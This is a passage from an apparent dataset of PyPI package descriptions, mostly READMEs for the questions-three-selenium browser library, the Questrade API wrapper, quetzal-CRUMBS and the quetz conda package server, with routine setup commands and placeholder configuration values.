this:browser.find_all_matching_elements(link_text='Finland')All selectors defined byselenium.webdriver.common.byare supported.find_all_matching_elementsReturns a list of all elements that match the given keyword. If no elements match, returns an empty list.divs = browser.find_all_matching_elements(tag_name='div')\nbobs = browser.find_all_matching_elements(id='bob')find_unique_elementExpects the given keyword argument to match exactly one element in the DOM.\nIf the expectation is met, returns the element.\nIf if no element matches, raises NoSuchElement.\nIf more than one element matches, raises TooManyElements.great_sorcerer = browser.find_unique_element(id='tim?')Detecting navigation to a new pagefrom questions_three.vanilla import wait_for\nfrom questions_three_selenium import Browser\n\nbrowser = Browser()\nbrowser.get('http://www.example.com/magic_page')\nare_we_there_yet = browser.func_that_detects_new_page()\nbrowser.find_unique_element(id='magic_button').click()\nwait_for(are_we_there_yet, timeout=20, throttle=1)Writing to HTML 5 local storageSome web applications uselocal storageinstead of cookies for storing things like session tokens.Browserprovides a convenience method for writing to it.session = log_in(username='ximinez', password='N0b0dyExpects')\nbrowser.add_to_local_storage(key='session_token', value=session)BrowserStack supportTyingBrowserto a fresh remote browser fromBrowserStackis a simple matter of setting some environment variables -- unless you also want to use their\"Local\"tunnel. More on that in a bit.For best results, visit BrowserStack'sCapabilitiespage and play with the available configurations. Each of the capabilities maps to an environment variable for Questions Three Selenium:CapabilityEnvironment Variable NameosBROWSERSTACK_OSos_versionBROWSERSTACK_OS_VERSIONbrowserUSE_BROWSERbrowser_versionUSE_BROWSER_VERSIONOther required environment variables:BROWSER_LOCATIONSet this to \"browserstack\"BROWSERSTACK_USERNAMESet this to the username associated with the BrowserStack accountBROWSERSTACK_ACCESS_KEYSet this to the access key provided by BrowserStack for automationOptional environment variables:BROWSERSTACK_SCREEN_RESOLUTIONSet this to one of the strings under \"resolution\" on theCapabilities pageBROWSERSTACK_SET_DEBUGSet this to \"true\" or \"false.\" It defaults to \"false.\"With those environment variables set, instantiate aBrowserobject as normal and it will launch a remote browser via BrowserStack.\"Local\" tunnelThe tunnel requires an executable binary provided by BrowserStack. The BrowserStack integration expects this binary to be in a zip archive at some URL. For best performance, this URL should refer to a nearby location that you control.Required environment variables:BROWSERSTACK_SET_LOCALSet this to \"true\"BROWSERSTACK_LOCAL_BINARY_ZIP_URLThis defaults to the Linux x64 binary at BrowserStack. Point it to wherever you have a zip archive of the binary.BROWSERSTACK_LOCAL_BINARYFull path and filename to where the binary should be stored locally. Default:/tmp/browserstack_tunnel/BrowserStackLocalBROWSERSTACK_URLURL to the BrowserStack hub. Default:http://hub.browserstack.com/wd/hubOptional environment variables:BROWSERSTACK_TUNNEL_TIMEOUTWait up to this number of seconds for the tunnel to open. Default: 30.Selenium Grid supportSelenium Gridsupport is a simple matter of setting environment variables and then instantiating aBrowserobject normally.Required environment variables:BROWSER_LOCATIONSet this to \"selenium_grid\"USE_BROWSERSet this to the name of the expected browser (e.g. \"Firefox\"). The exact names will vary with Grid configuration.SELENIUM_GRID_HUB_URLSet this to the URL of your hubOptional environment variables:USE_BROWSER_VERSIONAuthoritative list of environment variablesSeemodule_cfg.yml"} +{"package": "questlib", "pacakge-description": "Sandia National Laboratories application suite for energy storage analysis and evaluation tools."} +{"package": "quest-maker-api-shared-library", "pacakge-description": "Quest Maker API Shared LibraryThe Quest Maker API Shared Library provides a set of reusable components and utilities for building applications using the Quest Maker API. This library aims to simplify common tasks, enhance code consistency, and facilitate the development of projects related to quest management."} +{"package": "questo", "pacakge-description": "QuestoQuestois not your ordinary library of CLI elements; It's a framework. It's modular, extensible, Pythonic and brain friendly. You can build your own CLI elements, with custom key-press handling, validation and rendering, all in plain old Python; No magic.Basic Usagefromquestoimportselect,promptfromyakhimportget_keyselector=select.Select()selector.state=select.SelectState(title=\"Who's your favorite Teletubbie\",options=[\"Tinky Winky\",\"Dipsy\",\"Laa-Laa\",\"Po\",\"The Weird Vacuum Thing\"],selected=4)withselector.displayed():whileTrue:selector.state=select.key_handler(selector.state,get_key())ifselector.state.exitorselector.state.abort:breakprompter=prompt.Prompt()prompter.state=prompt.PromptState(title=f\"Why{selector.result}?\",)withprompter.displayed():whileTrue:prompter.state=prompt.key_handler(prompter.state,get_key())ifprompter.state.exitorprompter.state.abort:breakprint(f\"Ah, of course:{prompter.result}\")"} +{"package": "questplus", "pacakge-description": "A QUEST+ implementation in PythonThis is a simple implementation of the QUEST+ algorithm in Python.DocumentationPlease find the documentation atquestplus.readthedocs.io."} +{"package": "quest-py", "pacakge-description": "No description available on PyPI."} +{"package": "questpy-test", "pacakge-description": "Sandia National Laboratories application suite for energy storage analysis and evaluation tools."} +{"package": "questradeapi", "pacakge-description": "Questrade API WrapperThis package is a Python wrapper for the [Questrade API][https://www.questrade.com/api].InstallationTo install QuestradeAPI, you can usepipenv(orpip, of course):pip install questradeapiDocumentationAll the documentation is available athttps://questradeapi.readthedocs.io/en/latest/.Issue ReportingI you find a bug, have a feature request, or have design suggestions, please do not hesitate to report it in the issues section of this repository. For any security related issues, please do not report them publicly on the public GitHub issue tracker but contact me direcly by email.AuthorAntoine Viscardi"} +{"package": "questrade-api", "pacakge-description": "questrade_apiPython3 Questrade API WrapperInstallationUsepip/pip3:pip3 install questrade-apiGetting StartedFamiliarise yourself with theSecurity documentationfor the Questrade API.Generatea manual refresh token for your application.Init the API Wrapper with the refresh token:from questrade_api import Questrade\nq = Questrade(refresh_token='XYz1dBlop33lLLuys4Bd')Important:A token will be created at~/.questrade.jsonand used for future API callsIf the token is valid future initiations will not require a refresh tokenfrom questrade_api import Questrade\nq = Questrade()Using the APITimeq.time\n=> {'time': '2018-11-16T09:22:27.090000-05:00'}Accountsq.accounts\n=> {'accounts': [{'type': 'Margin', 'number': '123456', 'status': 'Active' ...}]}Account PositionsAccepts:q.account_positions(123456)\n=> {'positions': [{'symbol': 'RY.TO', 'symbolId': 34658, 'openQuantity': ...}]}Account BalancesAccepts:q.account_balances(123456)\n=> {'perCurrencyBalances': [{'currency': 'CAD', 'cash': 1000, 'marketValue': 0, ...}]}Account ExecutionsAccepts:,startTime=,endTime=q.account_executions(123456)\n=> {'executions': []}q.account_executions(123456,startTime='2018-08-01T00:00:00-0')\n=> {'executions': [{'symbol': 'RY.TO', 'symbolId': 34658, 'quantity': 100, ...}]}Account OrdersAccepts:,startTime=,endTime=,stateFilter=q.account_orders(123456)\n=> {'orders': []}q.account_orders(123456, startTime='2018-08-01T00:00:00-0')\n=> {'orders': [{'id': 444444, 'symbol': 'RY.TO', 'symbolId': 34658, ...}]}Account OrderAccepts:,q.account_order(123456, 444444)\n=> {'orders': [{'id': 444444, 'symbol': 'RY.TO', 'symbolId': 34658, 'totalQuantity': 100, ...}]}Account ActivitiesAccepts:,startTime=,endTime=q.account_activities(123456)\n=> {'activities': []}q.account_activities(123456, startTime='2018-11-01T00:00:00-0')\n=> {'activities': []}SymbolAccepts:q.symbol(34659)\n=> {'symbols': [{'symbol': 'RY.TO 'symbolId': 34658, 'prevDayClosePrice': ...}]}SymbolsAccepts:ids=',',names=','q.symbols(ids='34658,9339')\n=> {'symbols': [{'symbol': 'RY.TO', 'symbolId': 34658, 'prevDayClosePrice': ..}]}q.symbols(names='RY.TO,BNS.TO')\n=> {'symbols': [{'symbol': 'RY.TO', 'symbolId': 34658, 'prevDayClosePrice': ..}]}Symbols SearchAccepts:prefix='',offset=q.symbols_search(prefix='RY.TO')\n=> {'symbols': [{'symbol': 'RY.TO', 'symbolId': 34658, 'description': ...}]}q.symbols_search(prefix='RY', offset=5)\n{'symbols': [{'symbol': 'RY.PRE.TO', 'symbolId': 34700, 'description': ...}]}Symbol OptionsAccepts:q.symbol_options(34658)\n=> {'optionChain': [{'expiryDate': '2018-11-16T00:00:00.000000-05:00', 'description': ... }]}Marketsq.markets\n=> {'markets': [{'name': 'TSX', 'tradingVenues': ['TSX', 'ALPH', 'CXC', ... }]}Markets QuoteAccepts:q.markets_quote(34658)\n=> {'quotes': [{'symbol': 'RY.TO', 'symbolId': 34658, 'tier': ... }]}Markets QuotesAccepts:ids=','q.markets_quotes(ids='34658,9339')\n=> {'quotes': [{'symbol': 'RY.TO', 'symbolId': 34658, 'tier': ... }]}Markets OptionsAccepts:optionIds=,filters=q.markets_options(optionIds=[\n 23615873,\n 23615874\n])\n=> {'optionQuotes': [{'underlying': 'RY.TO', 'underlyingId': 34658, 'symbol': 'RY30Nov18 ..}]}q.markets_options(filters=[\n {\n \"optionType\": \"Call\",\n \"underlyingId\": 34658,\n \"expiryDate\": \"2018-11-30T00:00:00.000000-05:00\",\n \"minstrikePrice\": 90,\n \"maxstrikePrice\": 100\n }\n])\n=> {'optionQuotes': [{'underlying': 'RY.TO', 'underlyingId': 34658, 'symbol': 'RY30Nov18 ..}]}Markets StrategiesAccepts:variants=q.markets_strategies(variants=[\n {\n \"variantId\": 1,\n \"strategy\": \"Custom\",\n \"legs\": [\n {\n \"symbolId\": 23545340,\n \"ratio\": 10,\n \"action\": \"Buy\"\n },\n {\n \"symbolId\": 23008592,\n \"ratio\": 10,\n \"action\": \"Sell\"\n }\n ]\n }\n])\n=> {'strategyQuotes': [{'variantId': 1, 'bidPrice': None, 'askPrice': None, 'underlying': 'RY.TO' ...}]}Markets CandlesAccepts:,startTime=,endTime=,interval=q.markets_candles(34658, interval='FiveMinutes')\n=> {'candles': [{'start': '2018-11-16T09:30:00.583000-05:00', 'end': '2018-11-16T ..}]}"} +{"package": "questradeist", "pacakge-description": "No description available on PyPI."} +{"package": "quest-ssim", "pacakge-description": "REASDME.rst"} +{"package": "quetta", "pacakge-description": "# Quetta"} +{"package": "quetz", "pacakge-description": "No description available on PyPI."} +{"package": "quetzal", "pacakge-description": "quetzal v0.4.2.0DBMS that plans to implement a functionality to accept any python data type, one to remotely connect to the database, an API for other languages, and a long etc.My Discord: savra#4491"} +{"package": "quetzal-ai-toolkit", "pacakge-description": "An AI project aiming for cosnsolidating different functionalites under one global package."} +{"package": "quetzal-client", "pacakge-description": "quetzal-clientA Python package that provides a layer on top of quetzal-openapi-client for\neasier usage of theQuetzal API."} +{"package": "quetzalcoatl", "pacakge-description": "No description available on PyPI."} +{"package": "quetzal-crumbs", "pacakge-description": "Quetzal-CRUMBSThis python library is meant to be used along other software from the Quetzal\nframework to perform iDDC modeling and inference.iDDC modeling (Integrated Distributional, Demographic, Coalescent modeling) is a\nmethodology for statistical phylogeography. It relies heavily on spatial models\nand methods to explain how past processes (sea level change, glaciers dynamics,\nclimate modifications) shaped the present spatial distribution of genetic lineages.:rocket: The project website liveshere.In short:Access the high resolution paleoclimatic database CHELSA to download world filesFit a Species Distribution model and save (persist) the fitted modelDistribute the fitted model on cluster nodes and reconstruct landscape habitability dynamics across millennia.Assemble the layers and prepare the dynamic landscape for simulation-based inferenceIf using Quetzal-EGGS spatial simulators, retrieve parameters and simulated dataUse Decrypt to perform robustness analysis of species delimitation methods.What problem does this library solve?iDDC modeling is quite a complex workflow and Quetzal-CRUMBS allows to simplify things quite a lot.For example, to estimate the current habitat of a species using CHELSA-Trace21k model and reconstruct its high-resolution dynamics along the last 21.000 years (averaged across 4 different ML classifiers), with nice visualizations and GIS operations at the end, you can just do the following:# Pull the docker image with all the dependenciesdockerpullarnaudbecheler/quetzal-nest:latest# Run the docker image synchronizing you working directorydockerrun--user$(id-u):$(id-g)--rm=true-it\\-v$(pwd):/srv-w/srv\\becheler/quetzal-nest:latest/bin/bashThis will start your docker container. Once inside, copy/paste the following code in ascript.shfile,\nand then run it withchmod u+x script.sh && ./script.sh.#!/bin/bash# your DNA sampling points (shapefile)sample='sampling-points/sampling-points.shp'# for present to LGM analysis (but much longer computations) use instead:# chelsaTimes=$(seq -s ',' -200 1 20)chelsaTimes=20,0,-50# spatial buffer around sampling points (in degree)buffer=2.0# for proper SDM (but much longer computations) use instead:# biovars=dem,biobiovars=dem,bio01\n\ncrumbs-get-gbif\\--species\"Heteronotia binoei\"\\--points$sample\\--limit30\\--year\"1950,2022\"\\--buffer$buffer\\--outputoccurrences\n\nmkdir-poccurrences\nmvoccurrences.*occurrences/\n\ncrumbs-fit-sdm\\--presencesoccurrences/occurrences.shp\\--variables$biovars\\--nb-background100\\--buffer$margin\\--cleanup\\--sdm-file'my-fitted-sdm.bin'#\u00a0This part can be massively parallelized on dHTC gridscrumbs-extrapolate-sdm\\--sdm-file'my-fitted-sdm.bin'\\--timeID20crumbs-extrapolate-sdm\\--sdm-file'my-fitted-sdm.bin'\\--timeID19What is nice is that you can leverage these long computations for publication\nanalyses using dHTC (distributed Hight Throughput Computing)\nand distribute this load on a cluster grid: check outquetzal_on_OSG!Contact and troubleshooting:boom: A problem? A bug?Outrageous!:scream_cat: Please let me know by opening\nan issue or sending me an email so I can fix this! :rescue_worker_helmet::bellhop_bell: In need of assistance about this project? Just want to chat?\nLet me know and let's have a zoom meeting!:rocket: Updating the package (tip note for the dev)Create afeaturebranch, make updates to it.Test the featureBump the version insetup.cfgBump the version of thewhlfile in.circleci/config.ymlUpdate the ChangeLogPush to GitHub:rainbow: When you have a successful build onhttps://app.circleci.com/pipelines/github/Becheler/quetzal-CRUMBS:create a Pull Request (PR) to the develop branchMerge the PR if it looks good.When that build succeeds, create a PR to the main branch, review it, and merge.Go get a beer and bless this new version with some luuuv :beer: :revolving_hearts:Workflow fromhttps://circleci.com/blog/publishing-a-python-package/.:books: ReferencesKarger, Dirk Nikolaus; Nobis, M., Normand, Signe; Graham, Catherine H., Zimmermann,\nN.E. (2021). CHELSA-TraCE21k: Downscaled transient temperature and precipitation data\nsince the last glacial maximum. Geoscientific Model Development - DiscussionsVersion 1.0\nKarger, Dirk Nikolaus; Nobis, M., Normand, Signe; Graham, Catherine H., Zimmermann, N.E.\n(2021). CHELSA-TraCE21k: Downscaled transient temperature and precipitation data since\nthe last glacial maximum. EnviDat.Bocedi, G., Pe\u2019er, G., Heikkinen, R. K., Matsinos, Y., & Travis, J. M. (2012). Projecting species\u2019 range expansion dynamics: sources of systematic biases when scaling up patterns and processes. Methods in Ecology and Evolution, 3(6), 1008-1018.Baird, S. J., & Santos, F. (2010). Monte Carlo integration over stepping stone models for spatial genetic inference using approximate Bayesian computation. Molecular ecology resources, 10(5), 873-885.Estoup, A., Baird, S. J., Ray, N., Currat, M., CORNUET, J. M., Santos, F., ... & Excoffier, L. (2010). Combining genetic, historical and geographical data to reconstruct the dynamics of bioinvasions: application to the cane toad Bufo marinus. Molecular ecology resources, 10(5), 886-901."} +{"package": "quetzal-openapi-client", "pacakge-description": "quetzal-openapi-clientThis is an auto-generated package usingopenapi-generatorfrom an OpenAPI specification of the Quetzal API.\nAn improvement layer on this client exists in the quetzal-client package.Quetzal is an API to manage data files and their associated metadata.\nSee more atquetz.aland itsreadthedocs documentation."} +{"package": "quetz-client", "pacakge-description": "quetz-clientA Python client to interact with a Quetz server. This client is compatible with allquetzversions listedhere.InstallationFrom conda-forgemambainstallquetz-clientFrom this repoYou can install the package in development mode using:gitclonegit@github.com:mamba-org/quetz-client.gitcdquetz-client# create and activate a fresh environment named quetz-client# see environment.yml for detailsmambaenvcreate\ncondaactivatequetz-client\n\npre-commitinstall\npipinstall--no-build-isolation-e.UsagePython Clientfromquetz_clientimportQuetzClienturl=\"\"# URL to your Quetz servertoken=\"\"# API token for your Quetz serverclient=QuetzClient.from_token(url,token)forchannelinclient.yield_channels():print(channel)CLI ClientexportQUETZ_SERVER_URL=\"\"# URL to your Quetz serverexportQUETZ_API_KEY=\"\"# API token for your Quetz serverquetz-client--help"} +{"package": "quetz-frontend", "pacakge-description": "Quetz-frontendThe Open-Source Server for Conda Packagespart of mamba-orgPackage ManagermambaPackage ServerquetzPackage BuilderboaDevelopmentFirst of all, clone quetz and quetz-frontend, create a conda environment using theenvironment.ymlin quetz, run quetz and modify its config file.# Create an environmentmambaenvcreate-fquetz/environment.yml\nmambaactivatequetz\nmambainstall-cconda-forgenodejs=16yarn=1.22Install Quetz in dev modecdquetz\npipinstall-e.# Run quetzquetzruntest_quetz--delete--copy-conf./dev_config.toml--dev--reloadModify thequetz/test_quetz/config.tomlfile to add the client_id, client_secret, github username and the front-end paths.[github]# Register the app here: https://github.com/settings/applications/newclient_id=\"id\"client_secret=\"secret\"[users]admins=[\"github:username\"]Install Quetz-Frontend in dev mode# build the apppipinstall-e.# Create a link to the quetz folderquetz-frontendlink-frontend--developmentUseful commands# Start an already configured quetz deployment in dev mode:quetzstarttest_quetz--reload# Build the Quetz-frontendyarnrunbuild# Build the Quetz-Frontend in watch modeyarnrunwatchDisabling extensions\"quetz\":{\"extension\":true,\"outputDir\":\"quetz_light_theme/quetzextension\",\"themePath\":\"style/index.css\",\"disabledExtensions\":[\"quetz-theme\"]},Command line toolQuetz fronted also comes with a cli to manage extensionsUsage:quetz-frontend[OPTIONS]COMMAND[ARGS]...\n\nOptions:--install-completionInstallcompletionforthecurrentshell.--show-completionShowcompletionforthecurrentshell,tocopyitorcustomizetheinstallation.--helpShowthismessageandexit.\n\nCommands:buildBuildanextensioncleanCleantheextensionsdirectoryclean-frontendCleantheQuetz-FrontenddevelopBuildandinstallanextensionindevmodeinstallBuildandinstallanextensionlink-frontendIntalltheQuetz-FrontendlistListofextensionspathswatchWatchanextension"} +{"package": "quetzpy", "pacakge-description": "Quetzalcoatl :snake: :bird: :eyeglasses:Understand how people are talking of a topic based on a simple queryQuetzalcoatl :snake: :bird: :eyeglasses:1. WHAT IS IT?2. WHAT'S INSIDE THIS REPO ?2.1 root folder2.2 src folder2.3 __config__ folder2.4 media folder3. HOW TO USE IT ?4. ABOUT THE PROJECT5. CONTACT THE AUTHOR6. CONTRIBUTE1. WHAT IS IT?The Queztzalcoatl project is the ability to:eyes: excavate the :bird: Twitter API to extract insights about any topic that people talk about.From a topic, you should be able to understand how people react using the power of text mining.:arrow_up:Go to top page2. WHAT'S INSIDE THIS REPO ?Quetzalcoatl\n\u251c\u2500\u2500 /__config__\n\u2502 \u251c\u2500\u2500 DEMO_configuration_extractor.json\n\u2502 \u2514\u2500\u2500 DEMO_configuration_runner.json\n\u251c\u2500\u2500 /media\n\u251c\u2500\u2500 /src\n\u2502 \u251c\u2500\u2500 /modules\n\u2502 \u2502 \u251c\u2500\u2500 data_cleaning.py \n\u2502 \u2502 \u251c\u2500\u2500 data_mining.py \n\u2502 \u2502 \u251c\u2500\u2500 data_stats.py \n\u2502 \u2502 \u251c\u2500\u2500 decorators.py \n\u2502 \u2502 \u2514\u2500\u2500 tweeter_connection.py \n\u2502 \u2514\u2500\u2500 Quetzalcoatl.py\n\u251c\u2500\u2500 requirements.txt\n\u251c\u2500\u2500 demo.py\n\u251c\u2500\u2500 .gitignore \n\u251c\u2500\u2500 README.md\n\u2514\u2500\u2500 LICENCE2.1 root folderYou will find:FileDescriptionrequirements.txtUsed by pip to install dependanciesdemo.pyA demo script.gitignore-README.md-LICENCE-2.2 src folderYou will find:FileDescription/src/modulesContains modules used by the project/src/modules/data_cleaning.pymodule used to clean the tweets/src/modules/data_mining.pymodule used to extract insights from each tweets/src/modules/data_stats.pymodule used to run some statistics from the mined data or tracked words/src/modules/decorators.pymodule that contains all the decorators/src/modules/tweeter_connection.pymodule used to connect to the Twitter API/src/Quetzalcoatl.pyContains all the classes of the project2.3 __config__ folderYou will find the two configuration files used by the demo script2.4 media folderAll the stuff that are used to produce documents:arrow_up:Go to top page3. HOW TO USE IT ?Want to try the project? Please, follow the instructions from the Wiki page!:arrow_up:Go to top page4. ABOUT THE PROJECTI started this project a long time ago as my very first Python project. At first, I used some webscraping with Selenium as I didn't know how to use an API. As my experience with Python grew, I switched to the Twitter REST API and bash scripting and started think automation. Now, I am willing to create a package, or even an API inside which it would be possible to track an information inside a topic.:arrow_up:Go to top page5. CONTACT THE AUTHORYou can reach me on Twitter {LINK}I am also on LinkedIn {LINK}6. CONTRIBUTEThe Quetzalcoatl is a open source project. As so, if you feel interested in building the project with me, it would be amazing!Feel free to contact me on Twitter so I can tell you how you can help.We also have an issue page,link here!:arrow_up:Go to top page"} +{"package": "quetz-server", "pacakge-description": "The Open-Source Server for Conda Packagespart of mamba-orgPackage ManagermambaPackage ServerquetzPackage BuilderboaQuetzThe quetz project is an open source server for conda packages.\nIt is built upon FastAPI with an API-first approach.\nA quetz server can have many users, channels and packages.\nWith quetz, fine-grained permissions on channel and package-name level will be possible.Quetz has an optional clientquetz-clientthat can be used to upload packages to a quetz server instance.UsageYou should havemambaor conda installed.GetQuetzsources:gitclonehttps://github.com/mamba-org/quetz.gitThen create an environment:cdquetz\nmambaenvcreate-fenvironment.yml\ncondaactivatequetz\nln-s\"${CONDA_PREFIX}\".venv# Necessary for pyright.InstallQuetz:Use the editable mode-eif you are developer and want to take advantage of thereloadoption ofQuetzpipinstall-e.Use the CLI to create aQuetzinstance:quetzruntest_quetz--copy-conf./dev_config.toml--dev--reloadLinks:http://localhost:8000/- Login with your github accounthttp://localhost:8000/api/dummylogin/alice- Login with test user, one of [alice | bob | carol | dave]http://localhost:8000/docs- Swagger UI for this REST serviceDownloadxtensoras test package:./download-test-package.shTo upload the package, install thequetz-client:mambainstallquetz-clientTo run the upload, you need to set environment variables for the quetz API key (which authenticates you) and the quetz server URL. As we passed the--devflag to quetz, a testing API key can be found in quetz's output which you can use for this example.exportQUETZ_API_KEY=E_KaBFstCKI9hTdPM7DQq56GglRHf2HW7tQtq6si370exportQUETZ_SERVER_URL=http://localhost:8000\nquetz-clientpost_file_to_channelchannel0xtensor/linux-64/xtensor-0.24.3-h924138e_1.tar.bz2\nquetz-clientpost_file_to_channelchannel0xtensor/osx-64/xtensor-0.24.3-h1b54a9f_1.tar.bz2\nquetz-clientpost_file_to_channelchannel0xtensor/osx-arm64/xtensor-0.24.3-hf86a087_1.tar.bz2Install the test package with conda:mambainstall--strict-channel-priority-chttp://localhost:8000/get/channel0-cconda-forgextensorOutput:...\n Package Version Build Channel Size\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n Install:\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n xtensor 0.16.1 0 http://localhost:8000/get/channel0/osx-64 109 KB\n xtl 0.4.16 h04f5b5a_1000 conda-forge/osx-64 47 KB\n\n Summary:\n\n Install: 2 packages\n\n Total download: 156 KB\n\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n...Browse channels:http://localhost:8000/get/channel0/S3 BackendTo enable the S3 backend, you will first require the s3fs library:mambainstall-cconda-forges3fsThen add your access and secret keys to thes3section with yourconfig.toml, like so:[s3]access_key=\"AKIAIOSFODNN7EXAMPLE\"secret_key=\"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\"url=\"https://...\"region=\"\"bucket_prefix=\"...\"bucket_suffix=\"...\"Be sure to set the url and region field if not using AWS.Channels are created with the following semantics:{bucket_prefix}{channel_name}{bucket_suffix}The s3 backend is currently designed for one bucket per channel. It may be possible to put all channels in one bucket, but that will require some code tweaksIf you're using IAM roles, don't setaccess_keyandsecret_keyor set them to empty strings\"\".Google OAuth 2.0 OpenID ConnectTo enable auth via Google, you will need to register an application at:https://console.developers.google.com/apis/credentialsThen add the client secret & ID to agooglesection of yourconfig.toml:[google]client_id=\"EXAMPLEID420127570681-6rbcgdj683l3odc3nqearn2dr3pnaisq.apps.googleusercontent.com\"client_secret=\"EXAMPLESECRETmD-7UXVCMZV3C7b-kZ9yf70\"PostgreSQLBy default, quetz will run with sqlite database, which works well for local tests and small local instances. However, if you plan to run quetz in production, we recommend to configure it with the PostgreSQL database. There are several options to install PostgreSQL server on your local machine or production server, one of them being the official PostgreSQL docker image.Running PostgreSQL server with dockerYou can the PostgresSQL image from the docker hub and start the server with the commands:dockerpullpostgres\ndockerrun--namesome-postgres-p5432:5432-ePOSTGRES_PASSWORD=mysecretpassword-dpostgresThis will start the server with the userpostgresand the passwordmysecretpasswordthat will be listening for connection on the port 5432 of localhost.You can then create a database in PostgreSQL for quetz tables:sudo-upostgrespsql-hlocalhost-c'CREATE DATABASE quetz OWNER postgres;'Deploying Quetz with PostgreSQL backendThen in your configuration file (such asdev_config.toml) replace the[sqlalchemy]section with:[sqlalchemy]database_url=\"postgresql://postgres:mysecretpassword@localhost:5432/quetz\"Finally, you can create and run a new quetz deployment based on this configuration (we assume that you saved it in fileconfig_postgres.toml):quetzrunpostgres_quetz--copy-confconfig_postgres.tomlNote that this recipe will create an ephemeral PostgreSQL database and it will delete all data after thesome-postgrescontainer is stopped and removed. To make the data persistent, please check the documentation of thepostgresimageor your container orchestration system (Kubernetes or similar).Running tests with PostgreSQL backendTo run the tests with the PostgreSQL database instead of the default SQLite, follow the stepsaboveto start the PG server. Then create an new database:psql-Upostgres-hlocalhost-c'CREATE DATABASE test_quetz OWNER postgres;'You will be asked to type the password to the DB, which you defined when starting your PG server. In the docker-based instructions above, we set it tomysecretpassword.To run the tests with this database you need to configure theQUETZ_TEST_DATABASEenvironment variable:QUETZ_TEST_DATABASE=\"postgresql://postgres:mysecretpassword@localhost:5432/test_quetz\"pytest-v./quetz/testsFrontendQuetz comes with a initial frontend implementation. It can be found in quetz_frontend.\nTo build it, one needs to install:mambainstall'nodejs>=14'cdquetz_frontend\nnpminstall\nnpmrunbuild# for developmentnpmrunwatchThis will build the javascript files and place them in/quetz_frontend/dist/from where they are automatically picked up by the quetz server.Using quetzCreate a channelFirst, make sure you're logged in to the web app.Then, using the swagger docs at:/docs, POST to/api/channelswith the name and description of your new channel:{\"name\":\"my-channel\",\"description\":\"Description for my-channel\",\"private\":false}This will create a new channel calledmy-channeland your user will be the Owner of that channel.Generate an API keyAPI keys are scoped per channel, per user and optionally per package.\nIn order to generate an API key the following must be true:First, make sure you're logged in to the web app.The user must be part of the target channel (you might need to create a channel first, see the previous section on how to create a channel via the swagger docs)Go to the swagger docs at:/docsand POST to/api/api-keys:{\"description\":\"my-test-token\",\"roles\":[{\"role\":\"owner\",\"channel\":\"my-channel\"}]}Then, GET on/api/api-keysto retrieve your tokenFinally, set the QUETZ_API_KEY environment variable to this value so you can use quetz-client to interact with the server.Create a proxy channelA proxy channel \"mirrors\" another channel usually from a different server, so that the packages can be installed from the proxy as if they were installed directly from that server. All downloaded packages are cached locally and the cache is always up to date (there is no risk of serving stale packages). The reason to use the proxy channel is to limit traffic to the server of origin or to serve a channel that could be inaccessible from behind the corporate firewall.To create a proxy channel use the propertiesmirror_channel_url=URL_TO_SOURCE_CHANNELandmirror_mode='proxy'in the POST method of/api/channelsendpoint. For example, to proxy the channel namedbtelfrom anaconda cloud server, you might use the following request data:{\"name\":\"proxy-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"proxy\"}You may copy the data directly to the Swagger web interface under the heading POST/api/channelsor use the cURL tool from command line. Assuming that you deployed a quetz server on port 8000 (the default) on your local machine, you could make the request with the following cURL command:exportQUETZ_API_KEY=...\ncurl-XPOST\"http://localhost:8000/api/channels\"\\-H\"accept: application/json\"\\-H\"Content-Type: application/json\"\\-H\"X-API-Key:${QUETZ_API_KEY}\"\\-d'{\"name\":\"proxy-channel\",\"private\":false,\"mirror_channel_url\":\"https://conda.anaconda.org/btel\",\"mirror_mode\":\"proxy\"}'where the value ofQUETZ_API_KEYvariable should be the API key that was printed when you created the quetz deployment or retrieved using the API as described in the sectionGenerate an API key.Then you can install packages from the channel the standard way usingcondaormamba:mambainstall--strict-channel-priority-chttp://localhost:8000/get/proxy-channelnrnpythonCreate a mirroring channelA mirror channel is an exact copy of another channel usually from a different (anaconda or quetz) server. The packages are downloaded from that server and added to the mirror channel. The mirror channel supports the standard Quetz API except requests that would 